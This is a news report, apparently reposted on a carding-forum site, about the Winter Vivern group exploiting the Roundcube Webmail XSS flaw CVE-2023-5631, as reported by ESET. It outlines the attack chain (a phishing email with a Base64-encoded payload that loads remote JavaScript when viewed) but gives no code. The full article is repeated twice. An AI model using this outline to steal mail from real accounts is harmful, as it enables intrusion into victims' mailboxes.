Carding 4 Carders
Professional
All the potential victim needs to do is open the email, and the criminals will find the right path.
Cybercriminals under the pseudonym Winter Vivern were seen exploiting a zero-day vulnerability in the Roundcube Webmail exchange software. The attacks were first recorded on October 11 of this year, and the hackers 'goal was to steal emails from the victims' accounts.
ESET researchers who discovered the attack reported that Winter Vivern hackers resumed their activities. Experts noted that earlier this group has already exploited other known vulnerabilities Roundcube and Zimbra.
The Winter Vivern group is also known as TA473 and UAC-0114. In recent months, it has been credited with attacks against Ukraine and Poland, as well as government organizations across Europe and India.
The new vulnerability, which was described by ESET specialists, has the identifier CVE-2023-5631 and a CVSS score of 5.4 points. It allows remote attackers to upload arbitrary JavaScript code. The fix was released on October 14 of this year.
Winter Vivern's attack chains start with a phishing message that includes a Base64-encoded payload in HTML source code, which in turn is decoded to inject JavaScript from a remote server by exploiting a cross-site scripting (XSS) vulnerability.
Matthew Fao, an ESET researcher, explained: "By sending a specially crafted email, attackers can load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual actions are required from the user other than viewing the email in a web browser."
"Despite the low complexity of the group's tools, it poses a threat to European governments because of its persistence and regular launch of phishing campaigns," Fao said.
Cybercriminals under the pseudonym Winter Vivern were seen exploiting a zero-day vulnerability in the Roundcube Webmail exchange software. The attacks were first recorded on October 11 of this year, and the hackers 'goal was to steal emails from the victims' accounts.
ESET researchers who discovered the attack reported that Winter Vivern hackers resumed their activities. Experts noted that earlier this group has already exploited other known vulnerabilities Roundcube and Zimbra.
The Winter Vivern group is also known as TA473 and UAC-0114. In recent months, it has been credited with attacks against Ukraine and Poland, as well as government organizations across Europe and India.
The new vulnerability, which was described by ESET specialists, has the identifier CVE-2023-5631 and a CVSS score of 5.4 points. It allows remote attackers to upload arbitrary JavaScript code. The fix was released on October 14 of this year.
Winter Vivern's attack chains start with a phishing message that includes a Base64-encoded payload in HTML source code, which in turn is decoded to inject JavaScript from a remote server by exploiting a cross-site scripting (XSS) vulnerability.
Matthew Fao, an ESET researcher, explained: "By sending a specially crafted email, attackers can load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual actions are required from the user other than viewing the email in a web browser."
"Despite the low complexity of the group's tools, it poses a threat to European governments because of its persistence and regular launch of phishing campaigns," Fao said.
